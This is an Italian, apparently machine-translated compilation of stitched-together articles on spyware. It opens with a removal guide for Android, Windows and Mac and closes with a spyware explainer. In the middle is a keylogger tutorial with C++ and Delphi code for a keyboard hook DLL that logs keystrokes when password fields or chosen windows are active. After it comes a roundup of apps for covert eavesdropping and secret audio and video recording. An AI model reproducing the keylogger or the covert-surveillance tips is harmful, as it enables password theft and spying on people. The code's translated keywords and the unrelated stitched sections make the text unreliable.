Spyware su un computer. Spyware: tipologie e contromisure

Lo spyware è un tipo di software dannoso che esegue determinate azioni all'insaputa dell'utente, come visualizzare annunci pubblicitari, raccogliere informazioni riservate o apportare modifiche alle impostazioni del dispositivo. Se la velocità della connessione Internet diminuisce, il browser diventa lento o si verificano altri comportamenti insoliti, il computer potrebbe essere infetto da spyware.

Passi

Rilevamento e rimozione di spyware sul tuo dispositivo Android

    Riconosci i segnali dello spyware. Se la velocità della tua connessione Internet diminuisce frequentemente o il tuo smartphone riceve strani messaggi di testo, inclusi messaggi di sconosciuti, è molto probabile che il tuo dispositivo sia infetto da spyware.

    • Lo spyware genera spesso messaggi con una serie casuale di caratteri o chiedendo di inserire un codice specifico.
  1. Controlla come le applicazioni utilizzano il traffico Internet. Apri l'app Impostazioni e tocca Controllo traffico. Scorri verso il basso lo schermo e guarda quanto traffico viene consumato da ciascuna applicazione. Di norma, lo spyware consuma una grande quantità di traffico.

    Esegui il backup dei tuoi dati. Collega lo smartphone al computer utilizzando un cavo USB, quindi trascina i file importanti (come foto o contatti) sul disco rigido.

    • Poiché il dispositivo mobile e il computer utilizzano sistemi operativi diversi, il computer non verrà infettato.
  2. Apri l'app Impostazioni e tocca Backup e ripristino. Si aprirà una schermata con diverse opzioni, inclusa l'opzione per ripristinare il dispositivo alle impostazioni di fabbrica.

    Fare clic su "Ripristina impostazioni di fabbrica". Questa opzione si trova nella parte inferiore della schermata Backup e ripristino.

    Fare clic su Ripristina impostazioni. Lo smartphone si riavvierà automaticamente e i dati e le applicazioni dell'utente, inclusi gli spyware, verranno eliminati.

    • Tieni presente che il ripristino delle impostazioni di fabbrica cancellerà tutti i dati dell'utente. Pertanto, assicurati di eseguire il backup delle informazioni importanti.

    Utilizzo di HijackThis (Windows)

    1. Scarica e installa. Questa è un'utilità progettata per rilevare spyware. Fare doppio clic sul file di installazione per eseguirlo. Una volta installata questa utilità, eseguila.

      • Un software simile è Adaware o MalwareBytes.
    2. Fare clic su "Configurazione". Questo pulsante si trova nell'angolo in basso a destra dello schermo nella sezione "Altre cose". Si apriranno le impostazioni del programma.

      • Nelle impostazioni, puoi abilitare o disabilitare alcune funzionalità, come il backup dei file. Si consiglia di creare un backup se si lavora con file o software importanti. La copia di backup è di piccole dimensioni; Inoltre, può essere eliminato in seguito (dalla cartella in cui sono archiviati i backup).
      • Tieni presente che la funzione "Esegui backup prima di correggere gli elementi" è abilitata per impostazione predefinita.
    3. Fare clic su "Indietro" per tornare al menu principale. Questo pulsante sostituisce il pulsante Configurazione quando la finestra Impostazioni è aperta.

      Fare clic su Scansione. Questo pulsante si trova nell'angolo in basso a sinistra dello schermo e visualizzerà un elenco di file potenzialmente pericolosi. È importante notare che HijackThis scansionerà rapidamente i nodi più vulnerabili del sistema, quindi non tutti i file presentati nell'elenco saranno dannosi.

      Seleziona la casella accanto al file sospetto e fai clic su "Informazioni sull'elemento selezionato". Si aprirà una finestra con informazioni dettagliate sul file e il motivo per cui è stato incluso nell'elenco specificato. Dopo aver controllato il file, chiudi la finestra.

      • Vengono visualizzate informazioni dettagliate sulla posizione del file, i suoi possibili utilizzi e l'azione consigliata da intraprendere sul file.
    4. Fare clic su Correggi verificato. Questo pulsante si trova nell'angolo inferiore sinistro dello schermo; HijackThis utility ripristinerà o eliminerà il file selezionato (a seconda dell'azione selezionata).

      • Puoi selezionare più file contemporaneamente; Per fare ciò, seleziona la casella accanto a ciascuno di essi.
      • Prima di eseguire qualsiasi azione, HijackThis creerà (per impostazione predefinita) una copia di backup dei dati in modo che l'utente abbia la possibilità di annullare le modifiche apportate.
    5. Ripristina i tuoi dati dal backup. Per annullare eventuali modifiche apportate da HijackThis, fare clic su "Config" nell'angolo in basso a destra dello schermo, quindi fare clic su "Backup". Dall'elenco, seleziona il file di backup (il suo nome include la data e l'ora in cui è stato creato), quindi fai clic su Ripristina.

      • I backup verranno conservati finché non li eliminerai. Cioè, puoi chiudere HijackThis e ripristinare i dati in un secondo momento.

    Utilizzo di Netstat (Windows)

    1. Apri una finestra del prompt dei comandi. Netstat è un'utilità Windows integrata in grado di rilevare spyware e altri file dannosi. Clic ⊞Vincere+ R per aprire la finestra Esegui, quindi digitare cmq. La riga di comando fornisce l'interazione con il sistema operativo tramite comandi di testo.

      • Utilizza questo metodo se non desideri installare software aggiuntivo o desideri un maggiore controllo sul processo di rimozione del malware.
    2. Immettere il comando netstat -b e premere ↵Entra. Verrà visualizzato un elenco di processi che hanno accesso a Internet (possono aprire porte o utilizzare una connessione Internet).

      • In questa squadra l'operatore -B significa "codice binario". Cioè, sullo schermo verranno visualizzati i "binari" attivi (file eseguibili) e le loro connessioni.
    3. Premi Ctrl + Alt + Canc. Si aprirà il Task Manager di Windows, che elenca tutti i processi attivi. Scorri l'elenco e cerca il processo dannoso che hai rilevato utilizzando il prompt dei comandi.

      Fare clic con il tasto destro sul nome del processo e selezionare "Apri percorso di archiviazione file" dal menu. Si aprirà una cartella con un file dannoso.

      Fare clic con il tasto destro sul file e selezionare "Elimina" dal menu. Il file dannoso verrà inviato al Cestino, che impedisce l'esecuzione dei processi.

      • Se si apre una finestra che avverte che il file non può essere eliminato perché è in uso, torna alla finestra Task Manager, evidenzia il processo e fai clic su Termina processo. Il processo sarà completato e potrai eliminare il file corrispondente.
      • Se hai eliminato il file sbagliato, fai doppio clic sul Cestino per aprirlo, quindi trascina il file dal Cestino per ripristinarlo.
    4. Fare clic con il pulsante destro del mouse sul Cestino e selezionare Svuota dal menu. Ciò eliminerà definitivamente il file.

    Utilizzo del terminale (Mac OS X)

      Apri un terminale. Nel terminale è possibile eseguire un'utilità che rileverà lo spyware (se, ovviamente, ce n'è). Fare clic su "Applicazioni" - "Utilità" e fare doppio clic su "Terminale". Il terminale fornisce l'interazione con il sistema operativo tramite comandi di testo.

      • L'icona del terminale può essere trovata nel Launchpad.
    1. Immettere il comando sudo lsof -i | grep ASCOLTA e premere ⏎ Ritorno. Verrà visualizzato un elenco di processi attivi e informazioni sulla loro attività sulla rete.

      • Squadra sudo concede l'accesso root al comando successivo, ovvero consente di visualizzare i file di sistema.
      • lsofè l'abbreviazione di "elenco dei file aperti". Cioè, questo comando ti consente di visualizzare i processi in esecuzione.
      • Operatore -io indica che l'elenco dei processi attivi dovrebbe essere accompagnato da informazioni sulla loro attività di rete perché lo spyware si connette a Internet per comunicare con fonti esterne.
      • grep ASCOLTA– questo comando seleziona i processi che aprono determinate porte (ecco come funziona lo spyware).
    2. Inserisci la password dell'amministratore e fai clic su ⏎ Ritorno. Questo è ciò che richiede la squadra sudo. Tieni presente che mentre inserisci la password, questa non verrà visualizzata nel terminale.

    3. Scopri quali processi sono dannosi. Se non conosci il nome del processo o apre una porta, molto probabilmente si tratta di malware. Se non sei sicuro di un particolare processo o porta, cerca il nome del processo su Internet. Molto probabilmente, altri utenti hanno già riscontrato processi insoliti e hanno lasciato recensioni sulla loro natura (dannosa o innocua). Se sei sicuro che un processo sia dannoso, elimina il file che avvia il processo.

      • Se non hai ancora capito la natura del processo, è meglio non eliminare il file corrispondente, perché ciò potrebbe causare il blocco di alcuni programmi.
      • Assicurati che questo sia il file che desideri eliminare. Tieni presente che il file verrà eliminato definitivamente. Pertanto, ti consigliamo di creare preventivamente una copia di backup. Apri il menu Apple e fai clic su Preferenze di Sistema - Time Machine - Backup.
    • Se HijackThis restituisce troppi file sospetti, fai clic su "Salva registro" per creare un file di testo con i risultati e pubblicarli su questo forum. Forse altri utenti consiglieranno cosa fare con questo o quel file.
    • Le porte 80 e 443 vengono utilizzate da molti programmi attendibili per accedere alla rete. Naturalmente, lo spyware può utilizzare queste porte, ma ciò è improbabile, il che significa che lo spyware aprirà altre porte.
    • Una volta rilevato e rimosso lo spyware, modifica le password per ciascun account a cui accedi sul tuo computer. È meglio prevenire che curare.
    • Alcune app mobili che affermano di rilevare e rimuovere spyware sui dispositivi Android sono in realtà inaffidabili o addirittura fraudolente. Il modo migliore per pulire il tuo smartphone dagli spyware è ripristinarlo alle impostazioni di fabbrica.
    • Anche il ripristino delle impostazioni di fabbrica è un modo efficace per rimuovere lo spyware su iPhone, ma a meno che tu non abbia accesso root ai file di sistema, probabilmente lo spyware non sarà in grado di infiltrarsi in iOS.

    Avvertenze

    • Fai attenzione quando elimini file sconosciuti. L'eliminazione di un file dalla cartella "Sistema" (in Windows) potrebbe danneggiare il sistema operativo e successivamente reinstallare Windows.
    • Allo stesso modo, fai attenzione quando elimini file utilizzando il terminale in Mac OS X. Se pensi di aver trovato un processo dannoso, leggilo prima su Internet.

Informazioni sulla scrittura di keylogger
è stato detto già molte volte, ma tutte
hanno un grosso inconveniente: di regola,
sono richieste conoscenze molto limitate
informazioni, anziché scrivere tutto in un file di registro,
ciò che l'utente scrive sulla tastiera è improbabile per te
darà molto cibo per i registri dei pensieri
premendo i pulsanti durante la riproduzione di CS 😉

Ne consegue che la spia deve esserlo
avanzato e non scrivere stupidamente tutto ciò
gli danno :) Anche nominare un programma del genere
una spia non gira la lingua, è quasi
agente elettronico 007:-))) Modi per
in modo che il programma scriva nel log di interesse
Abbiamo molto materiale. Più semplice -
controllare le finestre attive, ad es. in quale
i pulsanti sono intasati in questo momento :) Come stai?
Penso che, sai, le spie di solito consistono in
file eseguibile e DLL. Ciò è dovuto al fatto
cosa intercettare i messaggi su window
devi creare un nuovo PROCESSO e molto altro ancora
Un modo conveniente per farlo è utilizzare una dll.
Pertanto, per attivare
in realtà il logger stesso, ti servirà in quello giusto
momento per caricare la DLL e quando la finestra è attiva
cambierà in qualcos'altro: scaricalo dalla memoria.

Diamo un'occhiata alle funzioni di lavorare con le DLL nel linguaggio visivo
C++. La dll viene caricata in memoria
funzione hINSTAGE=LoadLibrary("nome.dll"), dove hINSTAGE è
come un descrittore di una DLL caricata in memoria,
name.dll: nome della libreria. Per scaricarlo,
c'è una funzione FreeLibrary(hINSTAGE);

Ora su come possiamo ottenere le cose di cui abbiamo bisogno
applicazioni. Ad esempio, sappiamo che user
legge la posta attraverso il sito web www.mail.ru, quindi puoi
configurare l'agente in modo che intercetti
sequenze di tasti quando l'utente va a questo
sito web. (Va ricordato che in alcuni
Non esistono app spia per tastiera
può funzionare, ad esempio, nella barra degli indirizzi
Internet Explorer: questo porta ad un "crash"
completamento dei programmi" - cos'altro ti interessa
Cercasi Windows :))) Per questo metodo è abbastanza
è adatta anche la lettura delle password dal dialer
- se l'utente soffre di paranoie e ogni volta
entra nel login e passa manualmente :) O lo fai davvero
è interessante sapere cosa scrive in Outlook o
in un blocco note. Ecco la parte del codice che lo fa
confronto dei titoli delle finestre con quelli di cui abbiamo bisogno.

HINSTAGE hINSTAGE;

mentre (1)
{
//Avvia il ciclo.

int sl,ll;
ll=1;
sl=2;
//variabili per
contatore
UN.
salmerino;
HWND hw;
//Andiamo con quello più semplice
by - confrontiamo le stringhe carattere per carattere:
il titolo della finestra risultante e con quello di cui abbiamo bisogno
linea.

mentre (ll!=sl)
{

hw=GetForegroundWindow();
OttieniTesto Finestra(hw,st,128); // Leggere

char stt="_Qui scriviamo il titolo del desiderato
finestre per noi_№1";

sl=strlen(stt);
ll=0;
mentre (stt==st)
//confrontare
riga per carattere
//è più conveniente farlo dalla posizione che sarà
controlla se quello richiesto è adatto
//possiamo usare la stringa come parte di un'altra stringa, tu puoi
crea qualcosa come //un filtro ampio.

{
ll++;
}

se (ll==sl) ( //se stringhe
corrisponde fino alla fine della prima riga -

fermare; //interrompe il processo
}
// e così via - if
è necessario verificare la presenza di più finestre.

char stt="_Qui scriviamo il titolo del desiderato
finestre per noi_No. 2";
sl=strlen(stt);
ll=0;
mentre (stt==st)
{
ll++;
}

se (ll==sl) (
fermare; //interrompe il processo
}

Invece di un controllo sequenziale, puoi
fare parallelo se confrontato in
un ciclo di elementi di riga, se almeno uno
corrispondenze: la spia DLL viene attivata.

hINSTAGE=CaricaLibreria("chiave1.dll");

Ora dobbiamo controllare continuamente
se questa finestra rimane attiva.

mentre (ll==sl) //Ciao
le linee corrispondono: giriamo sul posto

{
hw=GetForegroundWindow();
OttieniTesto Finestra(hw,st,128);
// Leggere
la finestra attualmente attiva.

ll=0;
mentre (stt==st)
{
ll++;
}
}

L'uscita dal ciclo indica che è attivo
la finestra è cambiata, quindi scarichiamo lo "spyware"
libreria e il ciclo inizia dall'inizio, ovvero
il programma attende nuovamente uno dei
le finestre richieste.

Libreria libera(hINSTAGE);

Tuttavia, anche il metodo sopra ha
Svantaggi: devono essere controllati ogni volta
da un intero elenco di finestre è quello che ti serve?
noi attivi in ​​questo momento. Ecco perché
puoi usare un algoritmo diverso: non controllare
titolo della finestra e guarda se in this
finestra con elementi del tipo EditBox. Generalmente,
le password sono scritte lì :) Per questo ci sarà
guarda gli elementi di questa finestra - e se
tra questi c'è Modifica - quindi carichiamo la DLL.

carattere p2,p3; //array
caratteri per i titoli delle finestre.

Ancora una volta, controlliamo tutte le finestre in un ciclo:

while (p3!="Modifica") //Ciao
Non abbiamo trovato una finestra con una casella di modifica: esegui un ciclo

{

hw=GetForegroundWindow();

HWND hwnd_child; //variabile
elemento finestra

hwnd_child = GetWindow(hw,GW_CHILD);
OttieniNomeClasse(hwnd_child,p3,128);
se (p3!="Modifica")
//se il primo lo è
ho trovato gli elementi della finestra - non EditBox - quindi
guardando oltre

{
mentre (hwnd_child!=0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

OttieniNomeClasse(hwnd_child,p3,128);
se (p3=="Modifica")
{
fermare;
}
}
}
}

Ora parliamo della DLL spia stessa.
È meglio scriverlo in Delphi, perché questo
il discendente maturo di Pascal non ne ha
abitudine perversa "sipipish".
pignoleria sui tipi di dati. Creare
selezionare la libreria File-Nuovo-Libreria collegamento diretto - e
il modello per la DLL è pronto. Ed ecco il codice stesso:

chiave della libreria1;
utilizza Windows;

var
KGancio: HGANCIO; //variabile per
"trappole"

funzione KProc(Codice: intero; wParam: Parola; lParam: LongInt): LongInt; chiamata standard;
cost
KState: intero = 1073741824; //codice
"tasto premuto"

var
Simv: stringa corta;
KL: array di Char; //Per
controllando il layout della tastiera

FStruct: TOFSTRUCT;
F:File di testo;
//variabile
file per la registrazione del registro.

inizio

// elimina quelli non necessari
messaggi
se (lParam e KState)<>0 allora
inizio

Uscita;
FINE;

AssegnaFile(F, 'keylog.txt');

// provo ad aprire
file 'keylog.txt':
se OpenFile(PChar('keylog.txt'), FStruct, OF_EXIST) = HFILE_ERROR allora
inizio
Riscrivi(F);
// se il file non lo è
creato: creiamo.

FINE
altrimenti Aggiungi(F);
//se c'è, scrivi a
FINE.

Simv:=chr(0); //ripristina a zero
variabile del simbolo letto da tastiera.

// analizza il codice
tasto premuto
caso wParam di
// numeri
48..57: Simv:=Chr(wParam);
96: Simv:=’0′;
97: Simv:=’1′;

104: Simv:=’8′;
105: Simv:=’9′;
189,109: Simv:=’-‘;
110: Simv:=’.’;
111: Simv:=’/’;
FINE;

OttieniNomeLayoutTastiera(KL); //
controllando la disposizione

se KL = ‘00000409’ allora
// Se
Latino:

inizio
caso wParam di
219: Simv:="[';
221: Simv:=’]’;
186: Simv:=’;’;
222: Simv:=’”’;
188: Simv:=’,’;
190: Simv:=’.’;
191: Simv:=’/’;
65..90: Simv:=Chr(wParam);
FINE;
FINE;
FINE;
se KL = ‘00000419’ allora
// Se
russo

inizio
caso wParam di
219: Simv:='X';
221: Simv:=’Ú’;
186: Simv:=’F’;
222: Simv:=’E’;
188: Simv:='B';
190: Simv:='Yu';
191: Simv:=’.’;
65: Simv:=’Ô’;

87: Simv:='C';
88: Simv:='H';
89: Simv:=’Í’;
90: Simv:='Io';
FINE;

//se il simbolo non è vuoto (es.
se è stato premuto un tasto alfanumerico)
//poi lo scrivo in un file
se Simv<>" Poi
Scrivi(F, Simv);
//chiude il file
ChiudiFile(F);

// invia il messaggio
altre trappole nel sistema
Risultato:=CallNextHookEx(KHook, codice, wParam, lParam);
FINE;

inizio
//Imposta la trappola
per intercettare i messaggi della tastiera.

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

Questo programma può anche essere semplificato
a seconda dell'applicazione - se
diciamo che devi contare solo una volta
password dal dialer - quindi puoi impostarla
controllando le finestre finché non ne abbiamo bisogno e quando lo è
diventerà attivo: carica la libreria
key1.dll, attendere un certo tempo
in cui l'utente avrà il tempo di digitare questi caratteri
tastiera, quindi scaricare la libreria e
terminare il programma. Qualcosa come questo :)

hINSTAGE=CaricaLibreria("chiave1.dll");
Sonno(10000);
//attendi 10 secondi per questo
momento in cui l'utente digiterà la password.
//il tempo può essere aumentato a seconda
a seconda del livello di inibizione dell'utente
// e la sua velocità di digitazione sulla tastiera :)

Libreria libera(hINSTAGE);

PS: è stato fornito tutto il materiale di cui sopra
esclusivamente con demo e
obiettivi educativi generali stabiliti dall'autore
Ho un compito da dimostrare
algoritmo di programma del tipo "aggiornato".
keylogger" e tutto il resto
responsabilità per l'uso di questo
il materiale ti cade addosso (travolgente
onere 🙂) L'implementazione del codice contiene
piccole imprecisioni che in realtà non nuocciono
algoritmo: prova a trovarli tu stesso)).

PSS: Naturalmente, un keylogger non solo può
svolgere la sua funzione principale -
in realtà scrivi le pressioni dei pulsanti nel registro, ma anche
modificare i valori dei tasti premuti in base alle proprie esigenze
gusto - ma come farlo e a cosa serve
potrebbe semplicemente essere vitale - in
la prossima volta :)

Gli sviluppatori di app Android sono sempre stati noti per il loro ingegno. Pertanto, i gadget basati su questo sistema mobile possono essere utilizzati in quasi tutti gli ambiti della nostra vita, anche dove forse non avresti immaginato. Abbiamo preparato per te una selezione di app spia per Android, con le quali potrai sicuramente sorprendere la tua famiglia e i tuoi amici.

Questa applicazione è ideale per tutti i curiosi e ti permetterà di effettuare intercettazioni telefoniche come un vero agente dei servizi segreti. Ear Agent sfrutta il microfono integrato del tuo dispositivo mobile, amplificando il suono molte volte. In questo modo puoi sentire di cosa parlano le persone nelle vicinanze ed essere sempre consapevole di ciò che sta accadendo.

Per utilizzare l'applicazione, è necessario premere il grande pulsante centrale e regolare il cursore del volume. L'uso delle cuffie è un prerequisito per prestazioni ottimali. Ear Agent viene utilizzato al meglio insieme a un auricolare Bluetooth. In questo caso, lo smartphone con l'applicazione accesa può essere lasciato direttamente sul luogo degli eventi, e ci si può allontanare per ascoltare cosa sta succedendo.

Stai attento! Aumentare troppo il volume provoca una maggiore distorsione del suono, che a sua volta può avere un impatto negativo sull’udito.

Per ottimizzare il segnale audio in ingresso, il programma fornisce un equalizzatore, che in alcuni casi è in grado di estrarre anche un suono francamente debole.

In generale Ear Agent per Android fa bene il suo lavoro, anche nella versione gratuita, che in più permette di sbloccare un widget per accendere e spegnere velocemente il microfono. Ear Agent Pro offre un equalizzatore avanzato, funzionalità di riduzione del rumore e dell'eco, controllo automatico del guadagno e la possibilità di registrare ciò che ascolti.


tinyCam Monitor per Android è un vero vantaggio per una spia. Questa è un'applicazione abbastanza popolare tra i possessori di telecamere CCTV. Il programma può connettere e controllare a distanza telecamere IP, videoregistratori e persino fotocamere di smartphone e laptop (con software aggiuntivo).

Quando esegui per la prima volta tinyCam Monitor, crea diverse connessioni di prova a telecamere di sicurezza pubblica casuali da tutto il mondo. La connessione alla fotocamera è molto semplice: devi solo specificarne l'indirizzo IP e il numero di porta. Inoltre, il programma dispone di uno scanner che trova automaticamente le telecamere aperte all'interno della rete a cui è stata stabilita la connessione Internet sul tuo smartphone o tablet. In linea di principio, le istruzioni dettagliate per la configurazione sono presenti sia nell’applicazione stessa che sul sito web degli sviluppatori.

Gli utenti possono visualizzare fino a quattro telecamere contemporaneamente in modalità orizzontale. tinyCam Monitor fa un ottimo lavoro di streaming video. Se per qualche motivo la trasmissione di una telecamera si interrompe, l'immagine delle altre continua ad essere trasmessa normalmente. Una caratteristica speciale dell'applicazione è la modalità operativa sequenziale, in cui l'immagine proveniente dalle telecamere cambia automaticamente dopo un certo periodo di tempo. Tutte queste funzionalità sono disponibili per gli utenti in modo completamente gratuito.

La versione Pro di tinyCam Monitor potrebbe essere necessaria se è necessario collegare più di 4 fotocamere contemporaneamente. In questo caso, ottieni supporto per un massimo di 16 telecamere, registrazione video ciclica su una scheda di memoria o sul cloud, rilevamento di movimento e suono, possibilità di connessione in background e altre funzioni.


Esiste una categoria di persone che, quando possibile, cercano di frugare nello smartphone di qualcun altro. Se hai qualcosa da nascondere, allora questa applicazione fa per te. Intruder Selfie per Android è il tuo informatore personale che scatterà una foto a chiunque abbia preso in mano un dispositivo mobile senza chiedere.

In realtà, questa è l'unica funzione dell'applicazione ed è implementata abbastanza bene. Il programma viene eseguito in background e può essere configurato in modo che scatti foto con la fotocamera anteriore durante i tentativi riusciti e falliti di sbloccare lo smartphone, nonché quando lo schermo del dispositivo si accende semplicemente. L'utente può impostare il numero di tentativi di sblocco, dopo i quali verrà avviata la fotocamera, e il numero di foto (da 1 a 5) che l'applicazione scatterà. Intruder Selfie funziona in modo accurato e non desta sospetti nella persona che ha preso il tuo smartphone.


A volte si verifica una situazione in cui è necessario organizzare la videosorveglianza, ma non ci sono né i soldi né il tempo per acquistare attrezzature costose. In questo caso andrà bene qualsiasi smartphone, anche obsoleto, con un account Google e l'applicazione Alfred.


Con Alfred, puoi monitorare da remoto ciò che sta accadendo, ad esempio a casa tua, al lavoro o tutto in una volta: il programma supporta il lavoro con più telecamere contemporaneamente. Puoi organizzare una vera e propria videosorveglianza segreta durante un incontro con qualcuno senza destare sospetti. L'applicazione funziona in due modalità: monitor e fotocamera. Inoltre, a differenza di soluzioni simili, Alfred ti consente di cambiarle in qualsiasi momento.


In modalità fotocamera, l'applicazione spegne automaticamente lo schermo e inizia a scattare. Qui è possibile attivare anticipatamente il rilevamento del movimento se lo smartphone viene utilizzato come dispositivo di videosorveglianza fisso. In questo caso, riceverai notifiche istantanee quando la fotocamera rileva un movimento.


Alfred offre funzionalità avanzate in modalità di monitoraggio. Puoi utilizzare come monitor un altro smartphone o tablet con un'applicazione installata o qualsiasi PC con accesso a Internet. In questa modalità, tutte le telecamere coinvolte sono disponibili per la visualizzazione. È possibile visualizzare le informazioni per ciascuno, incluso lo stato della connessione e la carica rimanente della batteria. Anche le funzionalità di controllo remoto della fotocamera sono piacevolmente sorprendenti: commutazione tra la fotocamera principale e quella anteriore, rotazione dell'immagine, accensione/spegnimento del flash, modalità notturna, trasmissione audio e registrazione video.


Nel complesso, l'app Alfred per Android è abbastanza decente. L'unica delusione è la bassa qualità della trasmissione, che può essere migliorata acquistando un abbonamento a pagamento.


Tutti gli smartphone moderni possono registrare l'audio dal microfono integrato. Se un registratore vocale standard fa un ottimo lavoro nel registrare le chiamate, è meglio cercare una soluzione di terze parti per registrare il suono ambientale. Poiché non abbiamo bisogno di un normale registratore vocale, ma di un registratore segreto, per questi scopi abbiamo scelto Secret Voice Recorder per Android.

Questa applicazione ti consente di accendere segretamente il registratore vocale premendo tre volte il pulsante di accensione. È possibile interrompere la registrazione allo stesso modo. L'intervallo di tempo durante il quale l'utente deve premere il pulsante viene selezionato nelle impostazioni. Oltre all'accensione è possibile utilizzare i pulsanti del volume, anche se funzionano solo quando lo schermo è acceso.

Secret Voice Recorder può registrare l'audio nella memoria interna del dispositivo, su una scheda di memoria microSD e nell'archivio cloud di Google Drive. L'intero processo di registrazione avviene inosservato, l'applicazione viene eseguita in background e non si manifesta in alcun modo. Per comodità l'utente può attivare la vibrazione per segnalare l'inizio e la fine della registrazione.


Se hai bisogno di registrare un video sul tuo smartphone senza che nessuno se ne accorga, questa applicazione ti tornerà utile. Il videoregistratore in background può registrare video in background quando lo schermo è spento. Durante il processo di ripresa, l'utente può utilizzare attivamente il telefono per altri scopi e, quindi, non destare sospetti tra gli altri.

Background Video Recorder è molto facile da usare e tuttavia ha molte funzionalità e diversi strumenti utili come un semplice editor video e una galleria integrata.

L'enfasi principale dell'applicazione è nascondere tutte le tracce delle attività del programma. Qui puoi disattivare il suono dell'otturatore della fotocamera, modificare l'icona dell'applicazione sul desktop e nel pannello delle notifiche e persino nascondere la visualizzazione dei file video salvati sul tuo dispositivo mobile.

Background Video Recorder ti consente di preconfigurare il processo di registrazione: seleziona la fotocamera, dove salvare il video, l'orientamento e la risoluzione dell'immagine, determina la modalità di messa a fuoco automatica, microfono, flash e altre opzioni. Purtroppo il programma non prevede l'utilizzo di combinazioni di pulsanti per l'attivazione rapida. Ma c'è un widget e un programmatore di registrazione.

L'app Android Video Recorder in background è completamente gratuita e non ha limitazioni. Può anche salvare i video registrati sul cloud di Google.

Attenzione! Questo articolo e le sue applicazioni non devono essere considerati raccomandazioni per il tracciamento e lo spionaggio. Ricorda che ognuno ha diritto alla privacy e allo spazio personale.

Quasi tutti gli utenti oggi hanno familiarità con i virus e con le conseguenze del loro impatto sui sistemi informatici. Tra tutte le minacce che sono diventate più diffuse, un posto speciale è occupato dagli spyware che monitorano le azioni degli utenti e rubano informazioni riservate. Successivamente, mostreremo quali sono tali applicazioni e applet e discuteremo la questione di come rilevare lo spyware su un computer ed eliminare tale minaccia senza danneggiare il sistema.

Cos'è lo spyware?

Partiamo dal fatto che le applicazioni spia, o applet eseguibili, solitamente chiamate spyware, non sono virus in quanto tali nel senso comune del termine. Cioè, non hanno praticamente alcun impatto sul sistema in termini di integrità o prestazioni, anche se quando infettano i computer possono risiedere costantemente nella RAM e consumare parte delle risorse del sistema. Ma, di regola, ciò non influisce particolarmente sulle prestazioni del sistema operativo.

Ma il loro scopo principale è proprio quello di monitorare il lavoro dell'utente e, se possibile, rubare dati riservati, falsificare e-mail allo scopo di inviare spam, analizzare richieste su Internet e reindirizzare a siti contenenti malware, analizzare informazioni sul disco rigido, ecc. Inutile dire che ogni utente deve avere almeno un pacchetto antivirus primitivo installato per proteggersi. È vero, nella maggior parte dei casi, né gli antivirus gratuiti né, soprattutto, il firewall integrato di Windows forniscono completa fiducia nella sicurezza. Alcune applicazioni potrebbero semplicemente non essere riconosciute. È qui che sorge una domanda del tutto logica: "Quale dovrebbe essere allora la protezione di un computer dallo spyware?" Proviamo a considerare gli aspetti e i concetti principali.

Tipi di spyware

Prima di procedere con una soluzione pratica, è bene capire bene quali applicazioni e applet appartengono alla classe Spyware. Oggi ci sono diversi tipi principali:

  • registratori di chiavi;
  • scanner per dischi rigidi;
  • spie dello schermo;
  • spie postali;
  • spie per procura.

Ciascuno di questi programmi influisce sul sistema in modo diverso, quindi vedremo in che modo esattamente lo spyware penetra in un computer e cosa può fare a un sistema infetto.

Metodi di penetrazione dello spyware nei sistemi informatici

Oggi, a causa dell'incredibile sviluppo delle tecnologie Internet, il World Wide Web è il principale canale aperto e debolmente protetto che minacce di questo tipo utilizzano per penetrare nei sistemi o nelle reti informatiche locali.

In alcuni casi, lo spyware viene installato sul computer dall'utente stesso, per quanto paradossale possa sembrare. Nella maggior parte dei casi, non lo sa nemmeno. E tutto è banalmente semplice. Ad esempio, hai scaricato un programma apparentemente interessante da Internet e hai avviato l'installazione. Nelle prime fasi, tutto sembra come al solito. Ma a volte vengono visualizzate finestre che ti chiedono di installare qualche prodotto software aggiuntivo o componente aggiuntivo nel tuo browser Internet. Di solito tutto questo è scritto in caratteri piccoli. L'utente, cercando di completare rapidamente il processo di installazione e iniziare a lavorare con la nuova applicazione, spesso non presta attenzione, accetta tutte le condizioni e... alla fine riceve un "agente" incorporato per la raccolta delle informazioni.

A volte lo spyware viene installato su un computer in background, mascherandosi quindi da importanti processi di sistema. Potrebbero esserci molte opzioni: installare software non verificato, scaricare contenuti da Internet, aprire allegati e-mail dubbi e persino semplicemente visitare alcune risorse non sicure su Internet. Come è già chiaro, è semplicemente impossibile tenere traccia di tale installazione senza una protezione speciale.

Conseguenze dell'esposizione

Per quanto riguarda i danni causati dalle spie, come già accennato, generalmente non influiscono in alcun modo sul sistema, ma sono a rischio le informazioni degli utenti e i dati personali.

Le più pericolose tra tutte le applicazioni di questo tipo sono i cosiddetti key logger, o semplicemente, sono quelli che sono in grado di monitorare l'insieme di caratteri, dando così all'aggressore la possibilità di ottenere gli stessi login e password, dati bancari dettagli o codici PIN della carta e semplicemente qualcosa che l'utente non vorrebbe rendere disponibile a una vasta gamma di persone. Di norma, dopo che tutti i dati sono stati determinati, vengono inviati a un server remoto o via e-mail, ovviamente, in modalità nascosta. Pertanto, si consiglia di utilizzare speciali utilità di crittografia per archiviare informazioni così importanti. Inoltre, è consigliabile salvare i file non su un disco rigido (gli scanner del disco rigido li trovano facilmente), ma su un supporto rimovibile, o almeno su una chiavetta USB, e sempre insieme alla chiave di decrittazione.

Tra l'altro, molti esperti ritengono che l'uso della tastiera su schermo sia il più sicuro, anche se riconoscono l'inconveniente di questo metodo.

Il monitoraggio dello schermo in termini di ciò che sta facendo esattamente l'utente è pericoloso solo quando vengono immessi dati riservati o dettagli di registrazione. La spia prende semplicemente degli screenshot dopo un certo tempo e li invia all'aggressore. L'utilizzo della tastiera su schermo, come nel primo caso, non darà alcun risultato. E se due spie lavorano contemporaneamente, non potrai nasconderti da nessuna parte.

Il monitoraggio della posta elettronica viene effettuato tramite l'elenco dei contatti. L'obiettivo principale è sostituire il contenuto della lettera quando la si invia allo scopo di inviare spam.

Le spie proxy sono dannose solo nel senso che trasformano il terminale del computer locale in una sorta di server proxy. Perché è necessario? Sì, solo per nascondersi dietro, ad esempio, l’indirizzo IP dell’utente quando si commettono azioni illegali. Naturalmente l'utente non ne ha idea. Supponiamo che qualcuno abbia violato il sistema di sicurezza di una banca e abbia rubato una certa somma di denaro. Il monitoraggio delle azioni da parte dei servizi autorizzati rivela che l'hacking è stato effettuato da un terminale con questo o quell'IP, situato a questo o quell'indirizzo. I servizi segreti si avvicinano a una persona ignara e la mandano in prigione. Non c'è davvero niente di buono in questo?

Primi sintomi di infezione

